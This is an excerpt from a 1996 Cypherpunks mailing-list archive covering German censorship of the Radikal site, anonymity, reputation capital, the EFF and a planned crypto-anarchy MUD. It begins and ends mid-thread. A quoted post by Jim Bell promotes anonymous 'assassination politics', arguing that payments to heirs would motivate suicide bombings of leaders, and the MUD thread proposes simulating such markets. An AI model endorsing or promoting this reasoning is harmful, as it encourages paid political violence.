Tim's right on the "old fogies." Providing you make the cut off at about 50-55. After that you get retro-infantiles like me (at 61) who have fallen head over heels for the Internet, and are absolutely fed up with being "mature-and-responsible" -- that truly sucks, sucks, sucks.

Elsewhere in my field (architecture) I get accused by 40-55 year-olds of trying to brainwash the under-30s. You bet I am, to warn them off the "mature" assholes who think their warped experience is the best teacher, when in fact all it teaches is how to be bent out of shape, and how to project and promote that distortion as the definition of reality.

That crippling narrow vision passes at about 50-55 when you realize that you don't know shit, never did and never will. Every fails, in the end, well before The End. So what. Laugh, don't go hurt somebody.

Yep, self-deception is the certain sign of maturity, get used to it, it's as unavoidable as the wars mature folks, fearing mortality, wage to kill the helplessness in themselves.
Still, I admire the ingenuity of under-30s and over 55s who can trick the middling-matures into serving us, keeping us clothed and sheltered -- and entertained at their pompous fatuities.

Don't trust anyone between 30 and 55, especially those nuts with a Solution for The Problem They've Dreamed Up.

From declan at eff.org Fri Sep 6 04:23:21 1996
From: declan at eff.org (Declan McCullagh)
Date: Fri, 6 Sep 1996 19:23:21 +0800
Subject: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To:
Message-ID:

Looks like a more extensive translation now is available at:

http://www.anwalt.de/ictf/p960901e.htm

Tho it's still not complete. The criminal law links are only available in German, for instance.

-Declan

On Thu, 5 Sep 1996, Stephan Schmidt wrote:

> On Thu, 5 Sep 1996, Declan McCullagh wrote:
>
> >
> > You're not talking about http://www.anwalt.de/ictf/p960901e.htm, are you?
> >
>
> I'm talking about this link (you mentioned earlier).
>
>
> Maybe I can translate it (or I can summarize it).
> (tomorrow :)
>
> -stephan
>
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From mark at unicorn.com Fri Sep 6 04:23:59 1996
From: mark at unicorn.com (Rev. Mark Grant)
Date: Fri, 6 Sep 1996 19:23:59 +0800
Subject: MUD anyone?
In-Reply-To: <9608271647.AA22569@divcom.umop-ap.com>
Message-ID:

On Tue, 27 Aug 1996, Jon Leonard wrote:

> I've been planning to run a MUD like that, at mud.umop-ap.com port 2121.
> I just don't have enough coded to be worth announcing yet.

Cool. What's it running under? I was planning to base it around the latest version of the Nightmare library for MudOS, which I just downloaded. If I can get a copy somehow I could start hacking on it.

> Pseudonyms
> Anonymous digital cash (issued by any pseudonym, not just "banks")
> Public and private keys
> Secret sharing
> Anonymous broadcast & message pools
> Anonymous markets

All sounds like good stuff to me... DC Nets as well, of course.
I guess we should also simulate the Net somehow, with Web servers, email, etc. Though the Nightmare library apparently lets you create Mud objects which can access the Web so perhaps we can use the real one somehow (with the obvious security implications).

What else?

Protection Agencies
Escrow Agencies
Private Law Courts (probably controlled by players rather than the computer)
Reputation Agencies

> What am I missing? Should there be direct support for Jim Bell's
> assassination markets? It'd provide a means of demonstrating its
> ineffectiveness as a means of social control.

I think it should be incorporated, but I think that people can set them up easily themselves. Perhaps we should have an NPC-run 'Assassins Inc' which would run the lottery, and then players could do the actual 'wet work'. But yes, I'd really like to see how this would work in the game. As I said I'm thinking of this more as a semi-scientific experiment than a pure game. We have some idea of how this stuff should work in theory, but little of how it works in practice.

I do think though that we'd have to enforce some kind of rule against 'disposable characters', otherwise people could simply create a new character every time they were killed trying to assassinate someone. There would need to be some disadvantage to just going in guns-blazing and being killed ten times in a row.

> I think that for purposes of simulation, it's reasonable to model
> cryptographic primitives in a "Trust the server" mode, because you
> need to trust the MUD server anyway (unlike a government), and it
> puts a much lower load on the CPU.

Yep, I agree. I would like to include the real protocols but it's going to be far too slow. So we could create, say, remailer objects, anonymous digital cash objects, etc. As long as they have the same properties in 'SimAnarchy' as they would in real life then the actual behind the scene mechanics don't matter.
We could, perhaps, allow characters to break protocols if they could accumulate enough processing power. I don't know how low a level we'd want to go to.

I think that having an explicit group of remailers (and 'IP rerouters') would be a good idea as it would allow people to try to crack messages and perform traffic analysis. Some remailers could be run by NPCs (some of whom would be trustworthy and some wouldn't), others by the players themselves (with or without logging enabled).

I'd like to also include some way by which players could write 'software' even if they weren't able to create new objects for the game. So they could perhaps write front-ends for remailers and give them away or sell them to other players.

> There's also the question of log policy. Having run a MUD for a few
> years, I want to keep logs for bug detection. A declared policy that
> they aren't released for n years would work though. Opinions, anyone?

Part of me thinks that we should explicitly state that anything may be logged and used in sociological research. Perhaps we could create some kind of secure protocol to allow users to connect without revealing their real identities, so that it wouldn't matter if they were logged?

Anyone want to set up a mailing list for this discussion?

Mark

|-----------------------------------------------------------------------|
|Reverend Mark Grant M.A., U.L.C. EMAIL: mark at unicorn.com |
|WWW: http://www.c2.org/~mark MAILBOT: bot at unicorn.com |
|Approximate Current Location: Auckland, New Zealand |
|-----------------------------------------------------------------------|

From omega at bigeasy.com Fri Sep 6 04:25:15 1996
From: omega at bigeasy.com (Omegaman)
Date: Fri, 6 Sep 1996 19:25:15 +0800
Subject: What is the EFF doing exactly?
Message-ID: <199609051928.OAA19142@bigeasy.com>

> If anyone objects the officials responsible make a wide gesture and say "We
> didn't take away your phones, CRIMINALS took away your phones."

Indeed.
It appears the Unabomber has taken away the privilege of dropping stamped mail weighing over 16ozs into street-side mailboxes. One is now instructed to take these packages to a post-office mail clerk for mailing. (Of course it's unclear just what would be done if a package weighing over that magical 16ozs was left in a mailbox)

> The real question is this, what are you going to do to annihilate anonymous
> communication, because if you think it's harmful that's what you have to
> do.
>

What strikes me as odd is that the arguments against anonymous communication are nearly identical to those against strong crypto. ie. the same four horsemen flare up in these discussions. Yet we have parties who are ostensibly pro-crypto but anti-anonymity.

To put it in a nutshell, in a free society I can have a private conversation, but I must essentially announce that I am having one and who I am having that conversation with?

Do you believe the benefits of privacy outweigh the costs? Do you feel the same about cryptography and believe it to be an essential tool to advance the privacy of individuals? Then you _must_ be an advocate of anonymity and anonymous communications. Privacy as a right and a reality does not exist without the capability for anonymity.

me
--------------------------------------------------------------
Omegaman
PGP Key fingerprint = 6D 31 C3 00 77 8C D1 C2 59 0A 01 E3 AF 81 94 63
Send a message with the text "get key" in the "Subject:" field to get a copy of my public key.
--------------------------------------------------------------

From 72124.3234 at compuserve.com Fri Sep 6 04:29:26 1996
From: 72124.3234 at compuserve.com (Kent Briggs)
Date: Fri, 6 Sep 1996 19:29:26 +0800
Subject: rc2 export limits..
Message-ID: <199609051720.NAA24787@spirit.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart wrote:
>
> I'm afraid my source is "Read it on the net and was surprised to hear it".
> My assumption is that the limit is for software that implements
> both signature and verification, since ITAR doesn't ban export of
> pure-authentication software.
>
> Is the State Dept doc on the net? It would be nice to have something
> saying there are well-defined rules that they agree to follow,
> unreasonable and unconstitutional though they may be.
>

I'm still skeptical that such a restriction (1024-bit signatures) exists. If I recall, I originally found the State Dept. doc on the EFF site under a heading of CJ Export kit or something similar. I don't know if it is still there but it was out of date anyway as the contact in it had retired. You can probably contact the DoS and have them mail you one (as I did):

Attn: Sam Capino
U.S. Department of State
Office of Defense Trade Controls
PM/DTC Room 200
1700 N. Lynn Street
Arlington, VA 22209-3113
Voice: 703-875-7396
Fax: 703-875-6647

The procedure is 5 pages and titled "Procedure for Submitting a Commodity Jurisdiction Request for a Mass Market Software Product that contains Encryption"

When using RC2 and/or RC4, you have to request a separate test vector sheet titled "Supplemental Form for Mass Market Software Expedited Review" for each CJ request.

Kent

P.S. Does anyone know how to turn off this Gratis auto-signing service? I keep getting double posts when replying directly to the list via Netscape to hks.lists.cypherpunks.

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]
From gregburk at netcom.com Fri Sep 6 04:31:51 1996
From: gregburk at netcom.com (Greg Burk)
Date: Fri, 6 Sep 1996 19:31:51 +0800
Subject: Reputations
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

mccoy at communities.com (Jim McCoy) writes:
> Greg Burk writes:
> > Too little incentive to shoot for the heights:
> >
> > Suppose you judge that you've accumulated twice as much "reputation
> > capital" as Joe. How do you get twice as much payoff? It seems to me
> > that above the threshold of credibility, minor side issues make more
> > difference than your two-fold "reputation capital" differential.
>
> Go read Ender's Game by Orson Scott Card (a good book to read anyway :)
> and examine the nature of the computer network "discussion groups" he talks
> about: a classic example of reputation markets in many-to-many discussions.
> With the proper tools someone with twice the reputation capital in a
> particular category as another will have a greater chance of what they say
> not being filtered out as noise.

I have read it, a long time ago. Frankly, it's a spectacularly bad example. He writes of the two child-protagonists gaining reputations as great philosophers on a sort of Usenet. (At the time I believe OSC was a member of Delphi, UNCLEORSON)

Look around on the real Usenet. OSC could not have been more wrong.

> > As an "asset", it is extremely non-liquid:
> >
> > How exactly would you "convert" your reputation into other capital?
> > Would you accept bribes and tell lies? Seems to me you would only get a
> > one-shot "conversion" and it couldn't possibly hope to equal your
> > investment.
>
> Tell that to Walter Cronkite, Siskel & Ebert, Moody's and others who have
> converted reputation capital into large piles of money.
> Time is an asset
> that has a monetary value to most people, and they are willing to spend money

You don't seem to realize you are actually including at least one major example of a counterfeit reputation here. I speak of Siskel & Ebert, whom I have caught at least once giving a strikingly dishonest review.

I had seen the movie (See You In The Morning) on opening day, before they reviewed it. It stunk. After the credits rolled, the audience walked out in sullen silence, unable to believe they had spent money to see it. Nobody in the entire audience gave any sign of liking any part of the thing even a little bit. Whereas they had been talkative and somewhat excited before it started.

A few days later, I saw S&E's review. One of them (Siskel, I think) raved and raved about it. Perhaps he was the only person in the country who liked it, but I don't believe that. He gave it a lengthy, raving thumbs-up. Then the other (Ebert, I think) said "Well, I didn't like it as much as you did", thumbs down, and *stopped*.

Conclusion: They knew it stunk, but for some reason I won't speculate on they wanted to say they liked it so they misreported it, and covered their butts with a review that would look mixed later but sound like a rave now.

I see a counterfeit reputation.

> No, I think that you just don't understand the mechanics of reputations and
> how they interact with the most important resource in most people's lives:
> time.

I'm tempted to tit-for-tat, but I will not refute your points by telling you you just don't understand.

> time. Instead of thinking of "reputation" look at it from the other end and
> consider the "attention marketplace."

Fine, but resolving good vs counterfeit reputations takes time too.

> Right now reputation markets have a
> limited presence on the internet (mostly through killfiles) because the tools
> required are not integrated into the tools used to browse the information.
> In time this will change.

How?
I ask for something more specific than In The Future Everything Will Be Done Right.

From qut at netcom.com Fri Sep 6 04:32:39 1996
From: qut at netcom.com (Dave Harman OBC)
Date: Fri, 6 Sep 1996 19:32:39 +0800
Subject: Declaring The Ultimatum To Fascist Germany
In-Reply-To:
Message-ID: <199609052104.OAA00829@netcom.netcom.com>

! (I also don't dislike Germans in general. I studied some German in high
! school--don't ask me to use it, though!--and have visited Germany. They
! just have a certain well-known tendency to take the authoritarian path at
! times.)

Yes.

How to get an anonymous Unix shell account in Germany, Singapore and the UK? Easy here, but is some *law* or custom in Germany to force ISP customers to show to demand passports or Germany's national ID card the citizens are forced to carry at all times under penalty of jail for the failure to do so?

There's obvious reasons why I and Declan would like to get accounts anonymously. But I'd do it with my passport name if I am able to do so. Distributing censored information carries more of a political statement if conducted by those with accounts that are located in the unfree country itself.

If something like Gerhard Lauck is practical proof, only those who intend to actually ever go to Europe or Asia in the status quo need worry about actually getting incarcerated for situationist anti-censorship activities. Who cares, I don't, personally.

From markm at voicenet.com Fri Sep 6 04:37:09 1996
From: markm at voicenet.com (Mark M.)
Date: Fri, 6 Sep 1996 19:37:09 +0800
Subject: Steganography -- Tell Tale Signs?
In-Reply-To: <199609050421.VAA21428@sirius.infonex.com>
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 4 Sep 1996, makofi wrote:

> 1) If I hide some PGP encrypted data in a
> gif, jpg or wav file will there be any tell tale
> signs to the naked eye of an expert? If yes,
> what are they?

I don't think so. Especially for jpg which uses a lossy compression scheme. Any random noise could be attributed to the compression. There is already enough noise in wav files that inverting one bit won't make much of a difference.

> 3) Are there any tools at the moment
> to expose (not crack) the hidden encrypted
> data? If none. are there tools in development?

The whole point of steganography is plausible denial. The data that someone could de-stego from a file should just be random garbage, in which case there would be no way of telling whether there was an encrypted file stegoed in the data file. If PGP files are used, a utility like Stealth is a must.

- -- Mark

PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From azur at netcom.com Fri Sep 6 04:37:40 1996
From: azur at netcom.com (Steve Schear)
Date: Fri, 6 Sep 1996 19:37:40 +0800
Subject: Tack of Internet censorship
Message-ID:

>nobody at replay.com wrote:
>Six months ago, the Internet censors and Exon wannabees took the
>tack of "the Internet is too hard to censor".
>
>Now, their motto is "There will be some who get around our
>censorship, but we will try anyway."
>
>Unfortunately, I believe these censorship strikes will
>keep happening unless we find a way to stalemate them.
>
>What I am proposing is that Apache or other WWW servers
>have a way to allow access to site B's URL at site A,
>similar to the old trick of finger user at sitea.com@siteb.com.
>
>Implementation should be simple. However, I wonder what
>is a good standard way to specify this in the URL or
>a site.

Whatever happened to Ray Cromwell's Decense project ?

Decense, "a cgi script designed to provide a double-blind pseudonym scheme which allows a site to hide behind a chain of http servers which 'proxy' for it. Neither the user [ID] requesting the document, nor the ultimate address of the destination web site is immediately available to prying government eyes.

-- Steve

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ | Internet: azur at netcom.com
Grinder | Voice: 1-702-655-2877
Sacred Cow Meat Co. | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129 |
---------------------------------------------------------------------
Just say NO to prescription DRUGS.

From jonl at well.com Fri Sep 6 04:37:49 1996
From: jonl at well.com (Jon Lebkowsky)
Date: Fri, 6 Sep 1996 19:37:49 +0800
Subject: Metcalf and Other Net.Fogies
Message-ID: <2.2.16.19960905154111.2b6f55fa@mail.well.com>

At 10:27 AM 9/5/96 -0700, Timothy C. May wrote:

>I'm evolving a hunch that the problems we're seeing with "old fogies"
>denouncing the Net, and anonymity, and "smut on the Net," are part of a
>larger cultural issue. Namely, the familiar case of an older generation
>complaining about the sloth and sin of the younger generations.

Hey, I'm 47, and I haven't given up on sloth and sin yet. 8-)

Seriously, the problem here is that you don't want to set up the stereotype you allude to further down ('don't trust anyone over 30'). Stereotypic thinking, ya know?
Besides which, I've run into some real dorks who were UNDER 30...

>(Caveat: I'm 44, so I'm certainly a generation older than many of you, and
>am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor,
>Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was
>in college, I recall of course similar predictions of disaster. (And as it
>turned out, the predictions that promiscuity would lead to a disaster
>turned out to be partly correct, viz. AIDS.))

Hmmmmm...are Dyson and Kapor really net.doomsayers? I really haven't heard any kinda doom and gloom from those two...

>Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how
>publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
>few minutes ago. He repeated his prediction of an "Internet collapse" in
>1996, based on overuse, on bad pricing models, on lack of controls, and on
>other concerns.

... and I've tended to think Metcalfe was just sending an 'ad absurdum' flare when he predicted the death of the Internet, not so much predicting as taking an impact analysis to the extreme.

>It could be that the Dennings, Dysons, Kapors, etc. of the world are simply
>growing jaded with the Net and are projecting their own ennui in their
>comments that the Net may need to be controlled. This may come with age, as
>I'm sure the Kapor of 25 years ago would not have wanted President Nixon
>and Attorney-General Mitchell telling him what he could read and write.

I'm not sure which comments you're referring to, but I've come to understand that the generation-gap thing has no pat answer. Dave Farber is younger than Bruce Taylor, if ya know what I mean...and there are plenty of old pharts who are active in the various movements and groups opposing any restriction of the Internet.

>(In fairness, none of these folks listed have called for censorship. But
>all have expressed "concerns" of one sort or another.
>Not that discussing
>concerns is inappropriate--after all, we do it all the time. But I sense in
>many of their phrasings of concerns a stereotypical "old fogeyness"
>emerging.)

I dunno. Consider this: almost 30 years ago a bunch of us were more or less active in left wing politics that had some of the same aims I see expressed on this list and elsewhere, and we made mistakes. I don't know that I learned from my mistakes the way you're sposed to, but some folks learned, and are trying not to fuck up again. On the other hand, some folks really are just stodgy, but I bet they were stodgy kids, too.

>Just a thought. Maybe the solution to the EFF problem is to "not trust
>anyone over 30."

Heh, right. Feet tall.

-- Jon Lebkowsky http://www.well.com/~jonl jonl at hotwired.com

From jf_avon at citenet.net Fri Sep 6 04:37:54 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Fri, 6 Sep 1996 19:37:54 +0800
Subject: Race Bit: C
Message-ID: <9609051658.AA20681@cti02.citenet.net>

On 5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote:

> For them, I would go to jail; for you, I would even cooperate with
> the BATF (which should be defunded 100%, IMO).

Why would you go to jail? Who made jails and who would use violence to bring you in?

jfa

From gregburk at netcom.com Fri Sep 6 04:38:59 1996
From: gregburk at netcom.com (Greg Burk)
Date: Fri, 6 Sep 1996 19:38:59 +0800
Subject: Reputations
Message-ID: <543fs4fz39@netcom.com>

-----BEGIN PGP SIGNED MESSAGE-----

tcmay at got.net (Timothy C. May) writes:
> To stick with my restaurant example, consider _advertising_. MacDonald's
> and Burger King spend hundreds of millions of dollars every year claiming
> their "restaurants" are great. Many millions of people obviously are
> swayed. So?
>
> Others choose not to trust the advice of the MacDonald's hucksters. Maybe
> only a tiny fraction choose Chez Panisse over MacDonald's. This is the way
> of the world.
>
> It's still the give and take of reputations.
> It ain't perfect (in that it
> doesn't produce results I believe are empirically valid and optimum :-}).
> But it's all we have. It's the market. The agora.

I'm reading "It's shaky. Accept that." Fine, consider it accepted. I don't think it is comparable to the market, simply because even the more nebulous market exchanges (say, consultant-on-call) are much more clearly defined.

> >"Reputation capital" is hard to spend down to absolute 0 because it is
> >significant work to distinguish valid "reputation capital" from
> >worthless counterfeit, and it is easy to counterfeit... just talk.
>
> I strongly disagree. It's quite possible for Person A to quickly convert
> his reputation to Person B to a _negative_ value. Real quick, in fact.

I don't see how there can be such a thing as negative reputation capital. Wouldn't that mean B believes the opposite of what A says? If you anti-believed someone in a consistent manner, couldn't they exploit that?

Also, you are speaking only of 1-to-1 reputation-relationships. But that is inefficient. The mere fact of having to evaluate each person's reputation yourself is significant work.

On the other hand, you could talk about the transmission of reputations. This seems more in line with what I understood "reputation" to mean, to include some element of indirect knowledge. But that's mighty easy to abuse and therefore mighty hard to trust.

For instance, when a certain infamously-low-reputation (deservedly so) individual recently joined the cypherpunk lists, others who had endured him in the past tried to relay their impressions of him. It proved very difficult to convey, and they were somewhat attacked for their efforts and not entirely believed. In other words, he *could not* spend down to 0, despite years of unflagging effort.

> Perhaps my short article did not fully explain a few things. Reputations
> are a _tensor_ or _matrix_ quantity. Person A has a reputation R(A,B) to
> Person B, a reputation R(A,C) to Person C, and so on.
(And the matrix may > be further broken down into reputations for advice on various subjects, in > various fields, etc.) I can't dispute or agree with your mathematical model until we can agree on more basic issues. > We may lump a lot of folks together and say, for example, that MacDonald's > has a reputation of R (MacDonald's, lots of people) = 0.7531. And perhaps R > (Chez Panisse, lots of people) = 0.0013 (i.e., they don't know what it is, > and so value the rep of Chez Panisse at near zero). > > And so on. Lots of examples could be given. I'll accept your example, but I don't see how the numbers are meaningful. > Now suppose that J. Anonymous Gourmand announces that MacDonald's is shit. > How much will anonymous claim hurt MacDonald's? Obviously, not much. Well, how many people did J. Anonymous Gourmand reach, anyways? Now, suppose J. Anonymous Gourmand spams all of Usenet, and millions of people who have never heard of J. Anonymous Gourmand before read a plausible but false account of the disgustingness of McDonald's food. Perhaps the same detailed study, just fake. (Not to intertangle this with other issues, let's further suppose that Ms. Gourmand sneaks in underneath spam-watcher's radar, and cleverly appears to be on topic in every group.) Nothing about her reputation has changed, but surely when her claim is read by millions it will hurt McDonalds a non-trivial amount. Again, that doesn't mean the reputation was not a factor. > But > what if the American Heart Association publishes a detailed study on the > fat levels of MacDonald's products and declares it to "Dangerous." The > effect will probably be greater, as R (AHA, many people) = high, and by the > kind of Dempster-Shafer belief calculus I discussed a few months ago, the > rep of the AHA propagates semi-transitively to the rep of MacDonald's. 
> > (This all happened recently, with the famous studies of fat levels of movie > theater food...sales dropped almost overnight, and now the fat levels of > popcorn, etc., have been changed for the better.) I don't think you are illustrating what you think you are. Consider the American Sociological Association. Wouldn't you say its reputation is equivalent to the American Heart Association's? Most people would, I think. And various claims by ASA members have certainly gotten as much press as anything the AHA has got. But the ASA winks at severe violations of its Code Of Ethics and lets its members pursue their Politically Correct agendas at the expense of science. They have effectively counterfeited a reputation. I've already made the points I wanted to make, so I may not have further comments. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMi9qpbMyVAabpHidAQFRnwH8CyCjOnz071ZMWXNNURR/NMSMw9y9bs+n dutQOqLSNqeJhsYwNZJP2Z1o+JdhWZ7sQ/xnhdWbdupYsoRhcpacpA== =zcJQ -----END PGP SIGNATURE----- From mech at eff.org Fri Sep 6 04:39:30 1996 From: mech at eff.org (Stanton McCandlish) Date: Fri, 6 Sep 1996 19:39:30 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609050409.XAA28542@mailhub.amaranth.com> Message-ID: <199609052242.PAA24752@eff.org> > >If this is the case she needs to be _much_ more careful about what she > >says in `personal' interviews. > > > > There seems to be a point being missed in this thread. :( > > This was not a 'personal' interview. The paper was not interested in > Ms. Dyson's views on anonymity on the internet because she seemed like a > nice person. The only reason she was interviewed is because of her > position with the EFF as chairwoman. Rather unlikely, actually. Dyson is far better known, everywhere but the Internet early-adopter crowd, as publisher of Release 1.0 and an industry analyst. Same goes for a lot of our other boardmembers. Who many people outside of the civ-lib crowd know Jane Metcalfe from EFF, vs. from Wired? 
Even Mitch Kapor is better known as founder of Lotus than of EFF. A lot of press coverage she gets never even mentions EFF at all! Barlow's probably the only exception - retired ranchers and songwriters who aren't also singers generally don't attract many reporters.

-- Stanton McCandlish
mech at eff.org
Electronic Frontier Foundation
Online Activist

From pjb at ny.ubs.com Fri Sep 6 04:42:40 1996
From: pjb at ny.ubs.com (pjb at ny.ubs.com)
Date: Fri, 6 Sep 1996 19:42:40 +0800
Subject: Browne and foreign tyrants
Message-ID: <199609051640.MAA00475@sherry.ny.ubs.com>

i also have never heard of an attempt on Hitler's life by anyone other than the germans. the us did, however, assassinate Yamamoto Isoroku, and did a very neat job of it at that.

i once read a sci-fi story about time travelers going back to kill Hitler, and the disaster that occurred when someone succeeded and Hitler's place was taken by someone even more onerous. in the story there was a group of people whose job it was to prevent this assassination, since so many people in the future had that idea that doing away with Hitler was a good thing to do there was practically a queue of would-be assassins.

-paul

> From cypherpunks-errors at toad.com Thu Sep 5 03:07:59 1996
> X-Sender: jimbell at mail.pacifier.com
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> Date: Wed, 04 Sep 1996 16:43:23 -0800
> To: libernet-d at listserv.rmii.com, nwlibertarians at teleport.com,
> dnowch2 at teleport.com
> From: jim bell
> Subject: Browne and foreign tyrants
> Sender: owner-cypherpunks at toad.com
> Content-Length: 2362
>
> >From: "George D. Phillies"
> >Subject: Re: Browne & foreign tyrants
> >There is a section of the Geneva Protocols forbidding actions in occupied
> >territories directed against officers of political parties. Under that
> >section, the actions in Somalia against, e.g., the treasurer of General
> >Aidid's political party, were war crimes. No one seems to get very upset.
> >
> >> If there is such a treaty, the US has a long history of ignoring it.
> >>
> >> 0) Attempts to kill Hitler.
> >I don't think we ever tried this.
>
> And this was a real shame. Over 30 million people died in WWII, directly or
> indirectly.
We knew that Hitler was going to be a problem well before 1936. > Think how many could have been saved... > > If anything, WWII is excellent proof that AP is a good idea. Stauffenberg > was the German who bombed Hitler's meeting in 1944 but failed to kill him. > Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a > recent "60 Minutes" episode related how hundreds of people knew about this > plot. > > The reason he failed was that while he was preparing the two bombs in a > bathroom, he was interrupted. (The bomb's delay mechamism was acid > dissolving a metal.) Rather than being caught, he left one of the > briefcases in the bathroom and went to the meeting with only one bomb. > Furthermore, he left the bomb at the meeting, but it was pushed behind the > heavy table after he left, which shielded Hitler from much of the force of > the explosion. > > If AP (or at least, some anonymous reward mechanism for Stauffenberg's > family) had been available, he would have done "the honorable thing," and > walked up to Hitler with the bomb and instantly detonated it right there, > resulting in both Hitler's and Stauffenberg's certain death. At least > hundreds of thousands or perhaps over a million people would have SURVIVED. > As it happened, Stauffenberg's reticence caused not only his death after > torture, but also the deaths of well over a hundred coup-plotters, but also > the thousands that were yet to die in the last 6+ months of WWII. > > Question: Would you kill yourself to save a million lives? Even if you > wouldn't, would you change your mind if your heirs would be anonymously paid > an extra $10 million dollars or so? I'd say that's a pretty substantial > motivation, wouldn't you? 
> > > > Jim Bell > jimbell at pacifier.com > From bdavis at thepoint.net Fri Sep 6 04:47:02 1996 From: bdavis at thepoint.net (Brian Davis) Date: Fri, 6 Sep 1996 19:47:02 +0800 Subject: Voluntary Disclosure of True Names In-Reply-To: Message-ID: > > > >the above is almost exactly what Dyson was saying, and I have been > > No, Dyson said "Therefore I would favor allowing anonymity -- with some > form of traceability only under terms considerably stronger than what are > generally required for a wiretap." ^^^^^^^^^^^^^^^^^^^^^ > I wonder what Dyson would consider acceptable? Regardless, she is not going to get it. EBD > This implies a role for government, and concomitant restrictions on related > anonymity technologies, to provide traceability. So much for mutual > agreement between sender and recipient. > > (I have nothing against senders and recipients agreeing to use the services > of some third party in providing ultimate traceability. I'm not wild about > the U.S. Government being this third party, paid for by tax money, but so > long as it is not required, it's a minor concern to me. I surmise, though, > that use of the U.S. Government as a third party would not be optional, in > the schemes of Dyson, Denning, and others of that ilk.) > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." 
> > > > > From tank at xs4all.nl Fri Sep 6 04:51:45 1996 From: tank at xs4all.nl (tank) Date: Fri, 6 Sep 1996 19:51:45 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <199609060818.KAA00428@xs2.xs4all.nl> Please forward: Contact: XS4ALL Internet BV (http://www.xs4all.nl) Postbus 1848 1000BV Amsterdam Fax: +31-20-6274498 Email: felipe at xs4all.nl * * * P R E S S R E L E A S E * * * GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL, WITH 3100 WEBPAGES German internetproviders, joined in the Internet Content Taskforce (ICTF), started censoring the Dutch website www.xs4all.nl, containing 3100 personal and commercial homepages. This act of censorship is caused by the webpage of a magazine that is banned in Germany, Radikal (http://www.xs4all.nl/ ~tank/radikal/). A German prosecutor sent the following message to the ICTF (http://www.anwalt.de/ictf/p960901e.htm): "Under the following addresses in Internet: http://www.serve.com/spg/154/ http://www.xs4all.nl/~tank/radikal//154/ and using the link on page http://ourworld.compuserve.com/homepages/angela1/radilink.htm one can call up the entire edition of the pamphlet entitled radikal Nr. 154". Parts of this pamphlet justify preliminary suspicion of promoting a terrorist organization under ' 129a, Par.3 of the German Criminal Code, public condoning of criminal activities penalizable under ' 140 no.2 of the German Criminal Code and preliminary suspicion of inciting to criminal activity under ' 130a Par.1 of the German Criminal Code. The Public Prosecutor General at the Federal Court of Justice has therefore initiated a criminal investigatory procedure against the parties disseminating this pamphlet. 
You are herewith informed that you may possibly make yourself subject to criminal prosecution for aiding and abetting criminal activities if you continue to allow these pages to be called up via your access points and network crosspoints" Providers in Germany are already blocking packets to and from the host www.xs4all.nl. The 3100 websites on this server include the Kurdistan Information Network (http://www.xs4all.nl/~tank/kurdish/htdocs/), the very popular Internet Charts (http://www.xs4all.nl/~jojo/) and the world famous Chip Directory (http://www.xs4all.nl/~ganswijk/chipdir/). XS4ALL has not received any request from the German Government regarding the homepage of Radikal. Without any prior contact the German prosecutor decided that the XS4ALL website needs to be blocked for German Internet Users. XS4ALL is awaiting legal advice, and will investigate if legal procedures against the German government are possible. Censorship on Internet usually has the opposite effect. Internetusers consider it a sport to publish censored materials. Many users have already published the Radikal website on other Internet hosts. Here are some of the URL's: http://burn.ucsd.edu/%7Eats/RADIKAL/ http://www.jca.or.jp/~taratta/mirror/radikal/ http://www.serve.com/~spg/ http://huizen.dds.nl/~radikal http://www.canucksoup.net/radikal/index.html http://www.ecn.org/radikal http://www.well.com/~declan/mirrors/ http://www.connix.com/~harry/radikal/index.htm http://www.xs4all.nl/~tank/radikal/index.htm Xs4all Internet will rotate the IP-numbering of the website www.xs4all.nl to ensure that it's 3100 userpages will all remain available for any internet-user. 
-- Felipe Rodriquez - XS4ALL Internet - finger felipe at xs4all.nl for http://xs4all.nl/~felipe/ - Managing Director - pub pgp-key 1024/A07C02F9 pgp Key fingerprint = 32 36 C3 D9 02 42 79 C6 D1 9F 63 EB A7 30 8B 1A From fletch at ain.bls.com Fri Sep 6 04:59:39 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Fri, 6 Sep 1996 19:59:39 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: <322E94B9.41C67EA6@systemics.com> Message-ID: <9609051411.AA28025@outland> > numbers, and alias the lot on their web site - this would increase the > number of blocked addresses needed. It might also be a good idea to run > some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although > of course this will then need to be a dedicated proxy machine) - again > this would increase the size of the blacklist that the Germans must use, Of course if they're simply denying all traffic to a given network, a different port isn't going to make any difference. :) > and may involve some awkward router programming (for example, a router > might be configured to allow all DNS traffic - if a proxy is sitting on > the DNS port, then things get a bit difficult to set up). Of course, > netscape probably won't allow use of these ports (it certainly doesn't > allow the use of port 79). I think the restriction on port 79 (the finger daemon port) was because there still are a lot of fingerd's with buffer 